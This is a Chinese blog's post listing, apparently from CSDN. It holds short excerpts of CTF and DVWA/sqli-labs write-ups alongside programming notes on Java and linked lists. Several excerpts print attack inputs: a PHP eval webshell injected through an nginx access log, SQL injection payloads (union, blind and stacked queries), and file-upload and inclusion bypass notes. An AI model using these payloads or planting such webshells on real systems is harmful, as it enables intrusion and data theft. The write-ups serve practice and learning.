- 博客(31)
- 收藏
- 关注
原创 ctf.show_web10
<?php $flag=""; function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($regex,"",$strParam); } if (!$con) { die('C.
2022-05-13 19:38:37
424
原创 php://input
php://input是一个只读信息流,当请求方式是post的,并且enctype不等于”multipart/form-data”时,可以使用php://input来获取原始请求的数据。
2022-05-13 16:25:12
475
原创 日志注入 ctf.show_web4
使用php://input 不行使用日志注入查看日志的默认目录,得到了日志文件?url=/var/log/nginx/access.log进行日志注入<?php @eval($_POST['a']);?>使用蚁剑连接得到flag
2022-05-13 16:24:33
578
原创 upload-labs 通关
pass-01function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; } //定义允许上传的文件类型 var allow_ext = ".jpg|.png|.gif"; //提
2022-05-08 11:13:15
168
原创 攻防世界 upload1
进入先查看源代码function check(){upfile = document.getElementById("upfile");submit = document.getElementById("submit");name = upfile.value;ext = name.replace(/^.+\./,'');if(['jpg','png'].contains(ext)){ submit.disabled = false;}else{ submit.disable
2022-05-07 16:33:48
246
原创 攻防世界 supersqli(堆叠注入)
1.首先判断有无注入点:1’ and 1=1 #1' and 1=2 #2.进行注入判断字段数1' order by 2 # //两个字段判断字段注入点1' union select 1,2 #出现一个正则替换查看其他人博客,发现是使用堆叠注入堆叠注入原理?mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔开,而堆叠注入其实就是通过结束符来执行多条sql语句堆叠注入触发条件堆叠注入触发的条件很
2022-05-04 14:48:31
1873
原创 Web_php_unserialize
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { .
2022-05-04 13:32:42
1000
原创 攻防世界 PHP2
访问/index.php 页面无反应,拿御剑扫发现有两个文件,有一个index.phps文件什么是phps文件?phps文件就是php的源代码文件,通常用于提供给用户(访问者)查看php代码,因为用户无法直接通过Web浏览器看到php文件的内容,所以需要用phps文件代替。其实,只要不用php等已经在服务器中注册过的MIME类型为文件即可,但为了国际通用,所以才用了phps文件类型。它的MIME类型为:text/html, application/x-httpd-php-source, ap..
2022-05-03 21:11:31
379
原创 kail 联网
1.vim /etc/network/interfaces2.auto loiface lo inet loopbackauto eth0iface eth0 inet dhcp3.systemctl restart networking#重启网卡
2022-05-03 20:32:24
149
原创 BUGKU 变量1
flag In the variable ! <?php error_reporting(0);include "flag1.php";highlight_file(__file__);if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ die("args error!"); } eval("var_dump($$args);".
2022-05-02 23:46:03
508
原创 DVWA XSS Stored
LOW<?phpif( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sanitize message input $message = stripslashes( $message ); $message = ((isset(
2022-04-30 22:05:37
235
原创 DVWA XSS DOM
DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。也就是说,..
2022-04-30 22:04:37
1159
原创 DVWA XSS(Reflected)
XSS(Reflected)#"Cross-Site Scripting (XSS)" attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code
2022-04-30 15:22:24
282
原创 DVWA 文件包含
Low<?php// The page we wish to display$file = $_GET[ 'page' ];?>没有做任何的现在,可以直接进行文件包含本地包含:远程服务器包含 :Medium<?php// The page we wish to display$file = $_GET[ 'page' ];// Input validation$file = str_replace( array( "...
2022-04-30 10:29:04
340
原创 DVWA 文件上传
LowFile Upload Sourcevulnerabilities/upload/source/low.php<?phpif( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILE..
2022-04-30 09:30:03
2145
原创 布尔盲注和时间注入 语法
布尔盲注1 ' or length(database()) >4 # 判断数据库长度1' or length(database())>4 #利用二分法来确定数据库名称 1 ' or left(database(),1)='s' #利用ascii码来确定 1' or ascii(substr((select database()),1,1)) > 100 #1’ or (select(length(table_name)) from informat...
2022-02-26 15:39:05
541
原创 POST注入 less 11-14
less-11正常输入,提示正确加一个冒号,提示错误尝试万能密码可以判断为单引号$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";(原代码)less -12-1 ”)union select 1,database() # (爆库名)-1 ' union select 1,group_concat(tab...
2022-02-23 23:22:13
526
原创 布尔盲注
布尔盲注常用的函数length() 返回字符串的长度substr() 截取字符串substr(a,b,c) 第一个是截取的字符串 ,第二个是截取的位置 ,第三个是截取的长度ascii() 返回字符串的ASCII码limit a,b 第一个字符代表查询内容的位置,第二个代表长度布尔盲注原理:通过网页的回显来判断读错,可以利用and < > = 来进行判断sql语句:SELECT * FROM users WHERE id='$id' LIMIT 0,1爆数据库(...
2021-12-04 23:23:33
867
原创 SQL 题目复现 sqli-labs less-3,less-4
less-3源代码if(isset($_GET['id'])){$id=$_GET['id'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'ID:'.$id."\n");fclose($fp);// connectivity $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"
2021-11-24 20:14:54
596
原创 JAVA多态(超详细讲解)
目录多态的基本介绍:实现多态的条件:1.继承:必须要有子类继承父类的继承关系。2.重写:子类需要对父类中的一些方法进行重写,然后调用方法时就会调用子类重写的方法而不是原本父类的方法。3.向上转型:在多态中需要将子类的引用赋给父类对象,只有这样该引用才能够具备技能调用父类的方法和子类的方法。JAVA面向对象编程有三大特性:封装、继承、多态。在我们学习了继承后,我们将继续学习多态。多态的基本介绍:这里引用下其他地方的解释。 所谓多态就是指程序中定义的引用变量所指向的具体类型.
2021-10-29 14:29:56
49750
13
原创 不带头结点的头插法和尾插法创建单链表
尾插法定义结构体typedef int DataType;typedef struct Node { DataType data; struct Node* next;}*SLNode, SLnode; //定义链表的结构体尾插法创建链表void insert(SLNode head, int n){ SLNode q,p; int i, data; p = head; scanf_s("%d",&data); head->data = dat
2021-10-28 16:46:03
5193
原创 关于两个有序链表的合并(代码参考)
#include <stdio.h>#include <malloc.h>typedef struct _list{ int data; struct _list* next;} list;void mergelink(list* p, list* q){ list* h, * r; h = (list*)malloc(sizeof(list)); h->next = NULL; r = h; while...
2021-10-21 21:03:13
455
原创 一个非递减的顺序存储线性表中,删除所有值相等的多余元素
#include <stdio.h>#define maxlen 30typedef struct{ int elem[maxlen]; int lenth; //存放顺序表中元素个数} sqlisttp;void demo(sqlisttp* L){ int i = 1, j = 0; while (i<L->lenth) { if (L->elem[i] != L->elem[j])...
2021-10-21 20:18:40
2115
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人